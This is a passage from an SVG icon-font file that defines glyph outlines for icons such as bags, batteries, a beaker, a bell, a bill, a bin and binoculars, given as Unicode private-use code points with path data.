<glyph glyph-name="bag-alt" horiz-adv-x="1000" unicode="&#xeeab;" d="M995 570c-5 67-53 117-120 118-39 0-78 0-117 0-37-1-37-1-37 35 0 75-49 124-125 125-32 0-65 0-97 0-35 0-70 0-105 0-54-1-99-36-114-88-5-19-4-37-3-55 0-15-5-18-19-18-43 1-85 0-128 0-78 0-121-49-127-128-4-55-4-105-1-163 3-48 15-81 51-107 3-2 6-4 8-7 105-82 227-118 358-131 16-1 21 3 21 19 3 37 27 64 57 65 30 1 53-22 60-60 1-3 2-6 2-9-1-14 4-16 18-16 51 5 102 14 152 28 94 27 180 68 249 140 9 10 16 19 18 34 8 74 3 147-1 218z m-650 113c0 62 69 113 154 113 84 0 153-51 153-113h-307z m155-472c-24 1-45-29-44-63 0-32 20-60 43-60 24 0 43 27 43 61 0 34-19 61-42 62z m496 86l-1 0-75-68c-61-41-163-90-325-114 0 0-22 2-37-7-15-10-16-39-57-43v0h-2v0c-42 4-42 33-58 43-15 9-36 7-36 7-163 24-265 73-325 114l-76 68 0 0v0l0 0 0-49v-249c-1-12 0-22 1-31 0-3 1-6 1-9 16-103 106-102 106-102s7 0 19-1c59-4 214-5 368-4l0 0 1 0v0l0 0 0 0v0l0 0 0 0c155-1 309 0 369 4 12 1 18 1 18 1s91-1 106 102c1 3 1 6 1 9 1 9 2 19 2 31v249l0 49 0 0v0z m-496-445l0 0 0 0 0 0z m0 0l0 0-1 0 1 0z" />
<glyph glyph-name="bag" horiz-adv-x="1000" unicode="&#xeeac;" d="M882 586c0 30-24 55-54 55h-65c-1 4-4 8-6 13-15 27-36 51-62 71-53 40-122 63-195 63-73 0-143-23-195-63-26-21-47-45-62-72-3-4-5-8-7-12h-64c-30 0-54-25-54-56v-94h764l0 95z m-560 55c7 9 16 17 26 25 40 31 94 48 152 48 58 0 112-18 152-48 10-8 18-16 26-25h-356z m578-554h-800l18 383h764l18-383z m3-67h-807l3 51h802l2-51z m3-49c1-32-23-59-54-59h-704c-31 0-56 27-54 59l2 32h808l2-32z" />
<glyph glyph-name="ban" horiz-adv-x="1000" unicode="&#xeead;" d="M901 520c-23 54-54 101-92 140-39 39-86 70-140 93-54 23-110 35-169 35s-116-12-170-35c-54-23-100-54-139-93-38-39-69-86-92-140-24-54-35-110-35-170s11-116 35-170 54-101 92-140c39-39 85-70 139-93 54-23 111-35 170-35s115 12 169 35c54 23 101 54 140 93 38 39 69 86 92 140 24 54 35 111 35 170 0 60-12 116-35 170z m-659-339c-34 51-51 108-51 169 0 56 14 108 42 156s65 85 112 113c47 28 99 42 155 42 62 0 119-18 170-52l-428-428z m542 49c-16-39-38-72-65-99-28-28-61-50-99-67-38-16-78-24-120-24-61 0-117 17-169 50l429 428c32-51 49-107 49-168 0-42-8-82-25-120z" />
<glyph glyph-name="bar-code" horiz-adv-x="1000" unicode="&#xeeae;" d="M63 635h98v-570h-98v570z m643 0h99v-570h-99v570z m-483 0h49v-570h-49v570z m307 0h50v-570h-50v570z m87 0h49v-570h-49v570z m209 0h50v-570h-50v570z m87 0h25v-570h-25v570z m-577 0h148v-570h-148v570z" />
<glyph glyph-name="bars" horiz-adv-x="1000" unicode="&#xeeaf;" d="M104-57v-14c0-9 7-16 16-16h760c9 0 17 7 17 16v14c0 10-8 17-17 17h-35s-9 7-9 16v795c0 9-7 17-16 17h-176c-9 0-17-8-17-17v-795c0-9-6-16-14-16s-13 7-13 16v531c0 9-8 16-17 16h-175c-9 0-17-7-17-16v-531c0-9-6-16-14-16s-14 7-14 16v400c0 9-7 17-16 17h-176c-9 0-17-8-17-17v-400c0-9-1-16-3-16h-31c-9 0-16-7-16-17z m564 821h127c10 0 17-7 17-17v-89c0-9-7-17-17-17h-127c-9 0-17 8-17 17v90c0 9 8 16 17 16z m-237-265h128c10 0 17-7 17-16v-268c0-9-7-16-17-16h-128c-9 0-16 7-16 16v268c0 9 7 16 16 16z m-252-231v84c0 9 7 17 16 17h128c9 0 16-8 16-17v-84c0-9-7-17-16-17h-128c-9 0-16 8-16 17z" />
<glyph glyph-name="basket" horiz-adv-x="1000" unicode="&#xeeb0;" d="M796 540l62 75c5 6 4 15-2 20l-47 39c-6 5-15 4-20-2l-109-132c-5-5-15-10-23-10h-314c-8 0-18 4-23 10l-109 132c-5 6-14 7-20 2l-47-39c-6-5-7-14-2-20l62-75c5-5 3-10-5-10h-122c-8 0-14-7-14-14v-100c0-8 6-14 14-14h63c7 0 15-6 16-14l54-352c1-7 8-14 16-14h548c8 0 15 7 17 14l53 352c2 8 9 14 17 14h63c7 0 14 6 14 14v100c0 7-7 14-14 14h-123c-7 0-10 5-5 10z m-451-432h-32c-8 0-15 6-16 14l-28 234c-1 8 4 14 12 14h65c7 0 14-6 14-14v-234c-1-8-7-14-15-14z m194 0h-65c-8 0-14 6-14 14v234c0 8 7 14 14 14h65c8 0 14-6 14-14v-234c0-8-6-14-14-14z m164 0h-32c-8 0-14 6-14 14v234c0 8 6 14 14 14h64c8 0 14-6 13-14l-29-234c-1-8-8-14-16-14z" />
<glyph glyph-name="battery-empty" horiz-adv-x="1000" unicode="&#xeeb1;" d="M926 423h-50c-6 0-11 5-11 11v124c0 6-5 11-11 11h-780c-6 0-11-5-11-11v-415c0-6 5-11 11-11h780c7 0 12 5 12 11v123c0 6 5 12 11 12h49c6 0 11 5 11 11v123c1 6-5 11-11 11z m-135-206c0-7-5-12-11-12h-634c-6 0-11 5-11 12v267c0 6 5 11 11 11h634c6 0 11-5 11-11v-267z" />
<glyph glyph-name="battery-full" horiz-adv-x="1000" unicode="&#xeeb2;" d="M926 423h-50c-6 0-11 5-11 11v124c0 6-5 11-11 11h-780c-6 0-11-5-11-11v-415c0-6 5-11 11-11h780c7 0 12 5 12 11v123c0 6 5 12 11 12h49c6 0 11 5 11 11v123c1 6-5 11-11 11z m-135-206c0-7-5-12-11-12h-634c-6 0-11 5-11 12v267c0 6 5 11 11 11h634c6 0 11-5 11-11v-267z m-185 30c-34 69-69 138-103 207-3 6-7 6-13 6l-162 0c-1 0-3 0-5 0-3-1-5-2-4-3 0-1 1-2 1-2 35-70 69-139 104-209 3-5 7-6 12-6l163 0c1 0 3 0 5 1 2 0 4 1 3 3 0 1-1 2-1 3z m-323 207c-1 3-7 6-10 6-32 0-63 0-94 0-1 0-2 0-4 0-2-1-3-6-3-12v-196c0-6 5-11 11-11h195c6 0 10 1 10 3 0 1-1 2-1 3-35 69-69 138-104 207z m460 5h-195c-6 0-10-1-10-2 0-1 1-2 1-3 35-69 69-138 104-207 2-3 7-6 11-6 30-1 61-1 92-1 2 0 3 1 4 1 3 0 5 5 5 11v196c0 6-5 11-12 11z" />
<glyph glyph-name="battery-half" horiz-adv-x="1000" unicode="&#xeeb3;" d="M926 423h-50c-6 0-11 5-11 11v124c0 6-5 11-11 11h-780c-6 0-11-5-11-11v-415c0-6 5-11 11-11h780c7 0 12 5 12 11v123c0 6 5 12 11 12h49c6 0 11 5 11 11v123c1 6-5 11-11 11z m-135-206c0-7-5-12-11-12h-634c-6 0-11 5-11 12v267c0 6 5 11 11 11h634c6 0 11-5 11-11v-267z m-185 30c-34 69-69 138-103 207-3 6-7 6-13 6l-162 0c-1 0-3 0-5 0-3-1-5-2-4-3 0-1 1-2 1-2 35-70 69-139 104-209 3-5 7-6 12-6l163 0c1 0 3 0 5 1 2 0 4 1 3 3 0 1-1 2-1 3z m-323 207c-1 3-7 6-10 6-32 0-63 0-94 0-1 0-2 0-4 0-2-1-3-6-3-12v-196c0-6 5-11 11-11h195c6 0 10 1 10 3 0 1-1 2-1 3-35 69-69 138-104 207z" />
<glyph glyph-name="battery-low" horiz-adv-x="1000" unicode="&#xeeb4;" d="M926 423h-50c-6 0-11 5-11 11v124c0 6-5 11-11 11h-780c-6 0-11-5-11-11v-415c0-6 5-11 11-11h780c7 0 12 5 12 11v123c0 6 5 12 11 12h49c6 0 11 5 11 11v123c1 6-5 11-11 11z m-135-206c0-7-5-12-11-12h-634c-6 0-11 5-11 12v267c0 6 5 11 11 11h634c6 0 11-5 11-11v-267z m-508 237c-1 3-7 6-10 6-32 0-63 0-94 0-1 0-2 0-4 0-2-1-3-6-3-12v-196c0-6 5-11 11-11h195c6 0 10 1 10 3 0 1-1 2-1 3-35 69-69 138-104 207z" />
<glyph glyph-name="beaker" horiz-adv-x="1000" unicode="&#xeeb5;" d="M825-21c0-37-30-67-67-67h-516c-37 0-67 30-67 67 0 4 1 7 2 10l179 469c0 1 0 2 1 2v269h-22c-16 0-29 13-29 29 0 16 13 30 29 30h51c16 0 29-14 29-30v-300c0-1 0-3 0-5 0-3-1-8-3-11l-107-283h388l-111 282c-1 3-2 6-2 10l0 1c-1 1-1 3-1 4v302c0 16 13 30 30 30h51c17 0 30-14 30-30s-13-29-30-29h-22v-270l185-469c1-4 2-7 2-11z m-382 245c0 12 10 22 22 22s22-10 22-22c0-12-9-22-22-22s-22 10-22 22z m15 0c0-4 3-7 7-7 4 0 8 3 8 7 0 4-3 8-8 8-4 0-7-4-7-8z m99 22c0 12 10 22 22 22 12 0 22-10 22-22s-10-22-22-22-22 10-22 22z m15 0c0-4 3-7 7-7s7 3 7 7-3 8-7 8c-4 0-7-4-7-8z m-76 74c0 16 14 30 30 30s31-14 31-30c0-17-14-31-31-31s-30 14-30 31z m14 0c0-9 8-16 16-16 9 0 16 7 16 16s-7 15-16 15c-8 0-16-7-16-15z" />
<glyph glyph-name="beard" horiz-adv-x="1000" unicode="&#xeeb6;" d="M834 650c-13 0-23-17-24-38-5-99-29-291-96-302-50-8-100 138-128 176-29 37-137 60-180-18-43-79-56-139-123-160-47-15-70 71-80 122-4 21-9 55-11 76-3 35-6 71-7 106 0 21-9 37-21 36-11-2-20-20-19-41 2-70 10-140 23-207 21-147 77-379 230-456 18-9 50-22 70-27 12-3 25-5 38-5 28 0 55 8 81 22 159 68 242 328 254 516 8 54 13 104 14 162 1 21-9 38-21 38z m-240-379c-17-10-28-8-35-1-15 14-17 54-36 64-27 14-71 3-71-32 0-37-39-39-49-27-32 38-9 75 15 98 14 15 43 35 64 38 36 5 73-12 73-12 75-43 58-117 39-128z m-283 467h42c14 0 25 11 25 25s-11 25-25 25h-42c-13 0-25-12-25-25 0-14 12-25 25-25z m336 0h42c14 0 25 11 25 25s-11 25-25 25h-42c-13 0-25-12-25-25 0-14 12-25 25-25z" />
<glyph glyph-name="bed" horiz-adv-x="1000" unicode="&#xeeb7;" d="M63 578c0 2 0 4 0 7 2 28 29 46 52 33 15-9 19-25 19-44 0-84 0-168 0-252v-16h802v-228h-72v152h-730v-152h-71v500z m310-73h13c71 0 142 0 212-1 94 0 187 1 281 0 36 0 59-25 59-66v-91h-565v158z m-197-56c0 16 7 28 17 38 12 12 26 17 41 17h109v-157h-167c0 35 0 68 0 102z" />
<glyph glyph-name="bell" horiz-adv-x="1000" unicode="&#xeeb8;" d="M901 330c-6 23-26 40-50 42-24 1-47-12-57-34-9-22-4-48 14-64 3-4 6-7 4-12-13-43-30-84-57-120-31-42-69-74-121-88-10-3-21-4-33-6 1 8 1 13 2 20-107-56-213-56-319 0-2-6-5-12-5-17 0-24-1-48 2-71 4-34 29-69 77-68 60 2 120 1 180 1 31 0 50 13 57 43 4 14 5 29 8 44 4 1 8 1 13 1 4 1 9 1 13 2 61 11 109 44 149 90 40 47 65 101 81 159 2 5 4 8 9 11 27 11 40 40 33 67z m-145 52c0 175-143 310-309 309-170 0-309-137-310-306-1-170 135-311 307-312 174-1 312 138 312 309z m-417-2c0 62 47 110 107 110 60 0 108-48 108-107 1-60-47-109-107-109-59 0-108 48-108 106z m157 3c0 27-22 49-50 48-27 0-50-22-49-49 0-27 22-49 49-49 28-1 50 22 50 50z m162 279c3-2 7-4 11-4 4 0 8 2 11 5l96 98c6 6 5 16-1 22-6 6-15 6-21 0l-96-99c-6-6-6-16 0-22z m-28 10c1 0 2 0 2 0 8 0 15 6 16 13l11 85c1 8-5 16-13 17-9 1-16-4-17-13l-12-84c-1-9 5-16 13-18z m63-14c-8-2-13-11-12-19 2-7 8-12 15-12 2 0 3 1 4 1l85 20c8 2 13 11 11 19-2 8-10 13-19 11l-84-20z m-480 5c3-3 7-5 11-5 4 0 8 2 11 5 6 5 6 15 0 21l-96 99c-5 6-15 6-21 0-6-6-7-15-1-22l96-98z m48 9c0 0 1 0 2 0 8 2 14 9 13 18l-12 84c-1 9-8 15-17 13-8-1-14-9-13-17l11-84c1-8 8-14 16-14z m-64-45c6 0 13 5 15 12 1 8-4 17-12 19l-84 20c-9 2-17-3-19-11-2-8 3-17 11-19l85-20c1 0 2-1 4-1z" />
<glyph glyph-name="beverage" horiz-adv-x="1000" unicode="&#xeeb9;" d="M478 618c-7 39-15 76-23 106-11 42-35 57-53 61-58 15-135-53-159-77-4-4-4-10 0-14l15-14c3-4 10-4 14 0 30 29 88 74 120 66 4-1 17-4 25-33 7-27 14-60 20-95 1-6-2-10-8-10h-16c-5 0-10-4-9-10l41-664c0-5 5-10 10-10h2c6 0 10-2 10-6 0-3 5-6 10-6h210c5 0 10 3 10 6 0 4 4 6 10 6h2c5 0 10 5 10 10l41 664c0 6-4 10-10 10h-260c-6 0-11 4-12 10z m-40-174l-8 129c0 6 3 10 6 10s8-4 9-10c7-44 14-89 19-129 1-5-3-10-8-10h-8c-5 0-10 5-10 10z m26-148c-5 10-1 22 9 27l60 29c10 5 22 1 27-9l29-59c5-10 1-22-9-27l-59-30c-10-5-22-1-27 10l-30 59z m123 13l-20 40c-1 3-4 6-6 8-4 3-8 9-8 15l2 22c1 12 11 20 23 19 0 0 69-5 69-5 12-1 21-11 20-23l-6-69c-1-12-11-21-22-20-1 0-24 2-38 3-5 1-12 5-14 10z m3-173h-24l-42 0c-11 0-20 9-20 20l-1 51c0 5 2 9 4 9 2 0 3 0 4 0 4 0 8 1 12 2l41 21c5 2 13 4 17 4h9c11 0 20-9 20-20l1-66c0-12-9-21-21-21z m-30-167c-9-6-22-4-28 5l-38 55c-6 9-4 22 5 28l47 32c4 3 8 3 9 0l0-6c0-17 14-31 31-31h12c5 0 12-4 16-8l6-9c6-9 4-22-5-29l-55-37z m40 94h-14c-2 0-3 1-4 1-2 0-3 0-4 1-1 0-2 1-3 2-1 0-2 1-3 2-1 1-1 1-2 2-1 1-2 3-3 4-1 3-1 6-1 8l-1 15v17c0 5 5 10 10 10h15c8 0 16 3 22 9 6 6 10 14 9 23v6s5 7 10 7l21 0c11 0 20-9 20-20l1-66c0-11-9-21-21-21l-52 0z m-95 381c-5 39-12 84-19 130-1 5 3 9 8 9h230c5 0 10-4 9-10l-8-129c0-5-5-10-10-10h-199c-5 0-10 5-11 10z" />
<glyph glyph-name="bill" horiz-adv-x="1000" unicode="&#xeeba;" d="M809 578h-628c-6-33-30-61-62-72-2-1-4-2-6-2v-110c17 26 46 44 80 44 52 0 95-43 95-95 0-52-43-94-95-94-34 0-63 17-80 44v-110c30-9 54-31 64-61h293c-87 18-153 111-154 224 1 124 83 226 183 226 101 0 183-102 183-226 0-113-67-206-154-224h285c9 29 32 51 62 60 4 1 8 2 12 3v317c-39 6-71 36-78 76z m78-235c0-52-43-94-95-94-52 0-95 42-95 94 0 52 43 95 95 95 52 0 95-43 95-95z m-148 0c0-29 24-53 53-53 29 0 53 24 53 53 0 30-24 53-53 53-29 0-53-23-53-53z m-493 0c0 30-24 53-53 53s-53-24-53-53c0-29 24-53 53-53 29 0 53 24 53 53z m-183 285v-556h875v556h-875z m866-486l-18 2-4 0 0 0-2 0h-3c-10 0-19-2-27-7-9-6-16-13-21-23l0-1-1-1c-1-4-3-9-3-13l-1-4-2-14h-704l-2 14 0 2 0 2c-3 15-11 29-25 37-7 5-16 8-25 8h-4l-16 2v395l16 1 4 0c28 2 50 25 50 53v2c0 0 0 0 0 1v4l-1 17h710l-1-17v-4l0-2c0-27 20-50 45-53 3-1 6-1 8-1 1 0 3 0 4 0l5 1 18 1 0-402z m-331 71c27 35 42 82 42 133s-15 97-42 132c-27 34-62 53-99 53-37 0-71-19-98-53-28-35-43-82-43-132 0-51 15-98 43-133 27-33 61-52 98-52 37 0 72 19 99 52z m-46 62c-8-10-21-17-36-20v-32c-4-1-8-1-12-1-4 0-8 0-12 1v29h-2c-6 0-11 0-16 0-4 1-9 1-13 2-4 1-8 2-12 3s-9 3-13 5c0 5 1 10 3 16 1 5 3 10 5 16 7-3 14-5 21-6 7-2 14-2 21-2 11 0 20 2 26 6 6 3 9 10 9 18 0 5 0 8-2 11s-4 5-7 7c-2 1-5 3-8 4-3 1-7 3-10 4l-14 6c-6 3-11 5-16 8-5 3-9 6-12 10-4 4-7 9-8 14-2 5-3 11-3 19 0 16 4 28 13 38 9 9 22 15 38 17v28c4 1 8 2 12 2s7-1 11-2v-27c8-1 15-2 21-4 7-1 14-3 21-6-1-10-4-20-8-30l-9 3c-2 1-6 2-8 3-4 1-7 1-11 1-4 1-9 1-14 1-3 0-6 0-9-1s-6-1-8-2c-3-2-5-4-7-6-1-3-2-6-2-10 0-4 1-7 2-10 1-2 3-4 5-6 2-2 5-3 7-4 3-2 6-3 8-4l16-7c7-2 13-5 19-8 5-3 10-6 14-10 4-4 7-9 9-15 2-6 3-13 3-22 0-15-4-27-12-37z" />
<glyph glyph-name="bin" horiz-adv-x="1000" unicode="&#xeebb;" d="M251-45c1-24 20-43 44-43h411c23 0 43 19 44 43l29 620h-558l30-620z m342 466c0 9 8 17 18 17h29c10 0 18-8 18-17v-355c0-9-9-17-18-17h-29c-10 0-18 8-18 17v355z m-125 0c0 9 8 17 18 17h29c9 0 17-8 17-17v-355c0-9-8-17-17-17h-29c-10 0-18 8-18 17v355z m-125 0c0 9 8 17 18 17h28c10 0 18-8 18-17v-355c0-9-8-17-18-17h-28c-10 0-18 8-18 17v355z m456 321h-190v36c0 5-4 10-9 10h-199c-5 0-10-5-10-10v-36h-189c-15 0-28-12-28-27v-87h652v87c0 15-12 27-27 27z" />
<glyph glyph-name="binary" horiz-adv-x="1000" unicode="&#xeebc;" d="M305 683c-1 6-3 10-6 14-2 4-5 7-9 9-4 2-9 3-14 3-7 0-13-2-17-5-5-4-8-9-11-16-2-7-3-17-3-28 0-18 3-31 9-39 6-7 13-11 22-11 7 0 13 2 18 6 5 4 8 9 10 16 3 7 4 17 4 28 0 10-1 17-3 23z m-15-55c-4-5-8-8-14-8-5 0-10 3-13 8-4 6-6 16-6 32s2 27 6 33c3 4 8 7 13 7s10-3 14-8c4-6 5-16 5-32s-1-26-5-32z m74-16v97h-7c-2-4-6-8-11-13-5-4-11-8-17-11v-11c4 1 8 3 12 6 5 3 9 5 12 8v-76l11 0z m92 71c-2 6-4 10-6 14-3 4-6 7-10 9-4 2-8 3-14 3-7 0-13-2-17-5-5-4-8-9-11-16-2-7-3-17-3-28 0-18 3-31 9-39 6-7 13-11 22-11 8 0 13 2 18 6 5 4 8 9 10 16 3 7 4 17 4 28 0 10-1 17-2 23z m-16-55c-4-5-8-8-14-8-5 0-10 3-13 8-4 6-6 16-6 32s2 27 6 33c4 4 8 7 13 7s10-3 14-8c4-6 6-16 6-32 0-16-2-26-6-32z m91 55c-2 6-4 10-6 14-3 4-6 7-10 9-4 2-9 3-14 3-7 0-13-2-17-5-5-4-8-9-11-16-2-7-3-17-3-28 0-18 3-31 9-39 6-7 13-11 22-11 7 0 13 2 18 6 4 4 8 9 10 16 2 7 4 17 4 28 0 10-1 17-2 23z m-16-55c-4-5-8-8-14-8s-10 3-13 8c-4 6-6 16-6 32s2 27 6 33c3 4 8 7 13 7 6 0 10-3 14-8 4-6 6-16 6-32s-2-26-6-32z m91 55c-2 6-4 10-6 14-3 4-6 7-10 9-4 2-9 3-14 3-7 0-13-2-17-5-5-4-8-9-11-16-2-7-3-17-3-28 0-18 3-31 9-39 6-7 13-11 22-11 7 0 13 2 18 6 5 4 8 9 10 16 3 7 4 17 4 28 0 10-1 17-2 23z m-16-55c-4-5-8-8-14-8s-10 3-13 8c-4 6-6 16-6 32s2 27 6 33c4 4 8 7 13 7 6 0 11-3 14-8 4-6 6-16 6-32 0-16-2-26-6-32z m-295-177v97h-7c-2-5-6-9-11-13-5-5-11-9-17-12v-11c4 1 8 3 13 6 4 3 8 5 11 8v-75l11 0z m92 70c-2 6-4 10-6 14-3 4-6 7-10 9-4 2-8 3-14 3-7 0-13-1-17-5-5-4-8-9-11-16-2-7-3-16-3-28 0-18 3-31 9-39 6-7 13-10 22-10 8 0 13 2 18 5 5 4 8 10 10 17 3 7 4 16 4 27 0 10-1 17-2 23z m-16-55c-4-5-8-8-14-8-5 0-10 3-13 8-4 6-6 16-6 32 0 16 2 27 6 33 4 4 8 7 13 7s11-3 14-8c4-5 6-16 6-32 0-16-2-26-6-32z m74-15v97h-7c-2-5-6-9-11-13-4-5-10-9-17-12v-11c4 1 8 3 13 6 4 3 8 5 11 8v-75l11 0z m65-1v97h-7c-2-4-6-8-11-13-4-4-10-8-17-11v-11c4 1 8 3 13 6 4 2 8 5 11 8v-76h11z m63-1c7 0 13 2 17 5 5 4 8 10 11 17 2 7 3 16 3 27 0 10-1 17-2 23-2 6-4 10-6 14-3 4-6 7-10 9-4 2-8 4-13 4-8 0-13-2-18-6-5-4-8-9-10-16-3-7-4-16-4-28 0-18 3-31 10-39 5-7 12-10 22-10z m-14 82c4 4 8 7 13 7s11-3 14-8c4-5 6-16 6-32 0-16-2-26-6-32-3-5-8-8-14-8-5 0-10 3-13 8-4 6-6 16-6 32 0 16 2 27 6 33z m102-80v97h-8c-2-5-5-9-10-13-5-5-11-9-18-12v-11c4 1 8 3 13 6 4 3 8 5 11 8v-75l12 0z m-356-92c-1 6-3 10-6 14-2 4-5 7-9 9-4 2-9 4-14 4-7 0-13-2-17-6-5-4-8-9-11-16-2-7-3-16-3-28 0-18 3-31 9-39 6-7 13-10 22-10 7 0 13 2 18 6 5 3 8 9 10 16 3 7 4 16 4 27 0 10-1 17-3 23z m-15-54c-4-6-8-8-14-8-5 0-10 2-13 8-4 5-6 15-6 31s2 27 6 33c3 4 8 7 13 7s10-3 14-8c4-5 5-16 5-32 1-16-1-26-5-31z m74-16v97h-7c-2-5-6-9-11-13-5-5-11-9-17-12v-11c4 1 8 3 12 6 5 3 9 5 12 8v-76l11 1z m92 70c-2 6-4 10-6 14-3 4-6 7-10 9-4 2-8 4-14 4-7 0-13-2-17-6-5-4-8-9-11-16-2-7-3-16-3-28 0-18 3-31 9-39 6-7 13-10 22-10 8 0 13 2 18 6 5 3 8 9 10 16 3 7 4 16 4 27 0 10-1 17-2 23z m-16-54c-4-6-8-8-14-8-5 0-10 2-13 8-4 5-6 15-6 31s2 27 6 33c4 4 8 7 13 7s10-3 14-8c4-5 6-16 6-32 0-16-2-26-6-31z m89 4c3 7 4 16 4 27 0 10-1 17-2 23-2 6-4 10-6 14-3 4-6 7-10 9-4 2-9 4-14 4-7 0-13-2-17-6-5-4-8-9-11-16-2-7-3-16-3-28 0-18 3-31 9-39 6-7 13-10 22-10 7 0 13 2 18 6 4 3 8 9 10 16z m-28-12c-5 0-10 2-14 8-3 5-5 15-5 31s2 27 6 33c3 5 8 7 13 7 6 0 10-3 14-8 4-5 5-16 5-32s-1-26-5-31c-4-6-8-8-14-8z m75-10c7 0 13 2 18 6 5 3 8 9 10 16 3 7 4 16 4 27 0 10-1 17-2 23-2 6-4 10-6 14-3 4-6 7-10 9-4 2-9 3-14 3-7 0-13-1-17-5-5-4-8-9-11-16-2-7-3-16-3-28 0-18 3-31 9-39 6-7 13-10 22-10z m-13 82c3 4 8 7 13 7 6 0 10-3 14-8 4-6 6-16 6-32 0-16-2-26-6-32-4-5-8-8-14-8s-10 3-13 8c-4 6-6 16-6 32s2 27 6 33z m102-80v97h-8c-2-5-6-9-11-13-5-5-10-9-17-12v-11c4 1 8 3 12 6 5 3 9 5 12 8v-76l12 1z m65 0v97h-8c-2-5-6-9-11-13s-10-9-17-12v-11c4 1 8 3 13 6 4 3 8 5 11 8v-76l12 1z m-435-138v96h-7c-2-4-6-8-11-13-5-4-11-8-17-11v-11c4 1 8 3 13 6 4 2 8 5 11 8v-75h11z m90 20c3 7 4 16 4 27 0 10-1 17-2 23-2 6-4 10-6 14-3 4-6 7-10 9-4 2-8 3-14 3-7 0-13-1-17-5-5-4-8-9-11-16-2-7-3-16-3-28 0-18 3-31 10-39 5-7 12-10 21-10 8 0 13 2 18 5 5 4 8 10 10 17z m-28-13c-5 0-10 3-13 8-4 6-6 16-6 32 0 16 2 27 6 33 4 4 8 7 13 7s10-3 14-8c4-5 6-16 6-32 0-16-2-26-6-32-4-5-8-8-14-8z m88-7v96h-7c-2-4-6-8-11-13-4-4-10-8-17-11v-11c4 1 8 3 13 6 4 2 8 5 11 8v-75h11z m65-1v97h-7c-2-4-6-8-11-13-4-4-10-8-17-11v-11c4 1 8 3 13 6 4 2 8 5 11 8v-76h11z m-262-86c-2-7-3-16-3-28 0-18 3-31 9-39 5-7 13-10 22-10 7 0 13 1 18 5 4 4 8 10 10 17 2 7 4 16 4 27 0 10-1 17-3 23-1 5-3 10-6 14-2 4-5 7-9 9-4 2-9 3-14 3-7 0-13-2-17-5-5-4-8-9-11-16z m28 12c6 0 10-3 14-8 4-5 5-16 5-32s-1-26-5-31c-4-6-8-8-14-8-5 0-10 2-14 8-3 5-5 15-5 31s2 27 6 33c3 4 8 7 13 7z m88-88v98h-7c-2-5-6-9-11-13-5-5-11-9-17-12v-11c4 1 8 3 12 6 5 3 9 5 12 8v-76h11z m34 76c-2-7-3-16-3-28 0-18 3-31 9-39 6-7 13-10 22-10 7 0 13 1 18 5 4 4 8 10 10 17 2 7 4 16 4 27 0 10-1 17-3 23-1 5-3 10-6 14-2 4-5 7-9 9-4 2-9 3-14 3-7 0-13-2-17-5-5-4-8-9-11-16z m28 12c6 0 10-3 14-8 4-5 6-16 6-32s-2-26-6-31c-4-6-8-8-14-8-5 0-10 2-13 8-4 5-6 15-6 31s2 27 6 33c3 4 8 7 13 7z m87-119h-294c-18 0-32 14-32 32v65c1 0 3 1 4 2 5 3 9 5 11 8v-75h12v96h-7c-2-4-6-8-11-12-3-3-6-4-9-7v92c5-6 12-9 21-9 6 0 12 2 17 5 5 4 8 10 10 17 3 7 4 16 4 27 0 10-1 17-3 23-1 6-3 11-6 14s-5 7-9 9c-4 2-9 3-14 3-7 0-13-1-17-5-2-1-3-3-4-4v116c2 0 4 1 5 2 5 3 8 6 11 8v-75h12v97h-7c-2-5-6-9-11-13-3-3-7-5-10-7v92c6-6 13-9 21-9 7 0 13 2 18 6 4 3 8 9 10 16 2 7 4 16 4 27 0 10-1 17-3 23-1 6-3 11-6 14-2 4-6 8-9 10-4 2-9 3-14 3-7 0-13-2-18-6l-3-4v139l5 3c5 3 8 5 11 8v-75h12v97h-7c-2-4-6-9-11-13-3-3-7-5-10-7v21c0 18 14 32 32 32h371c18 0 41-11 53-24l12-14c-2-3-4-5-8-8-5-5-11-9-17-12v-11c3 1 8 3 12 6 5 3 8 5 11 8v-75h12v80l13-14 45-52c11-13 20-39 20-56v-32c-2 2-3 4-6 6-4 2-8 3-14 3-6 0-12-2-17-6-5-4-8-9-10-16-3-7-4-16-4-27 0-19 3-32 10-40 5-7 13-10 21-10 8 0 14 2 18 6 1 1 2 2 3 2v-195c11-4 21-10 31-17v351c0 20-10 47-23 62l-50 58c-13 15-26 30-39 45-13 15-39 27-59 27h-412c-20 0-36-16-36-36v-804c0-20 16-35 36-35h374c-20 11-38 26-52 44z m-319 274c3 4 8 7 13 7s10-3 14-8c4-6 6-16 6-32s-2-26-6-32c-4-5-8-8-14-8-5 0-10 3-13 8-4 6-6 16-6 32 0 16 2 27 6 33z m0 300c3 4 8 7 13 7s10-3 14-8c4-6 6-16 6-32s-2-26-6-32c-4-5-8-8-14-8-5 0-10 3-13 8-4 6-6 16-6 32 0 16 2 27 6 33z m542-65c-3-5-8-8-14-8s-10 3-13 8c-4 6-6 16-6 32 0 16 2 27 6 33 4 4 8 7 14 7s10-3 13-8c4-6 6-16 6-32 0-16-2-26-6-32z m64-343l-2 0-6 16 0 1c20 44 18 45 15 49l-26 25c-1 1-2 2-4 2-2 0-6 0-44-18l-2 0-15 6-1 2c-18 44-20 44-24 44h-37c-4 0-6 0-23-44l0-2-16-6-2 0c-25 11-40 17-44 17-2 0-4-1-5-2l-26-26c-3-3-4-4 16-47l1-2-7-15-1-1c-46-17-46-19-46-23v-36c0-5 1-7 44-22 0-2 0-3 0-5 0-11 1-19 4-26-14-32-13-33-10-36l26-25c1-1 3-2 5-2 1 0 6 0 44 17l1 1 16-6 1-2c17-45 19-45 24-45h36c5 0 7 0 23 45l1 2 16 6 1-1c26-11 41-16 45-16 2 0 3 0 5 2l25 25c4 3 5 5-15 48l-1 1 6 15 2 1c45 18 45 19 45 24v36c0 5 0 7-45 23z m-127-99c-32 0-59 26-59 57s27 58 59 58c33 0 59-26 59-58s-26-57-59-57z" />
<glyph glyph-name="binoculars" horiz-adv-x="1000" unicode="&#xeebd;" d="M886 388c-46 49-95 96-144 142-35 32-76 41-121 22-12-5-23-11-35-16-38-17-78-23-120-17-25 5-48 15-70 26-27 14-54 20-84 14-24-5-44-16-61-33-42-41-83-84-125-124-51-48-72-105-61-173 15-96 99-162 196-157 72 5 124 40 158 104 3 6 6 12 9 19 43-42 103-40 143 0 2-4 3-6 4-9 36-82 122-129 209-111 72 15 121 58 143 128 23 69 8 132-41 185z m-636-277c-81 0-147 67-148 149 0 81 66 147 149 148 80 0 148-66 148-147 1-83-65-149-149-150z m233 356c0 9 7 17 17 17 10 0 18-8 18-17v-64c0-10-8-18-18-18-9 0-17 8-17 18v64z m16-252c-24 1-45 22-44 46 1 24 21 44 45 44 24 0 45-21 44-46 0-24-20-44-45-44z 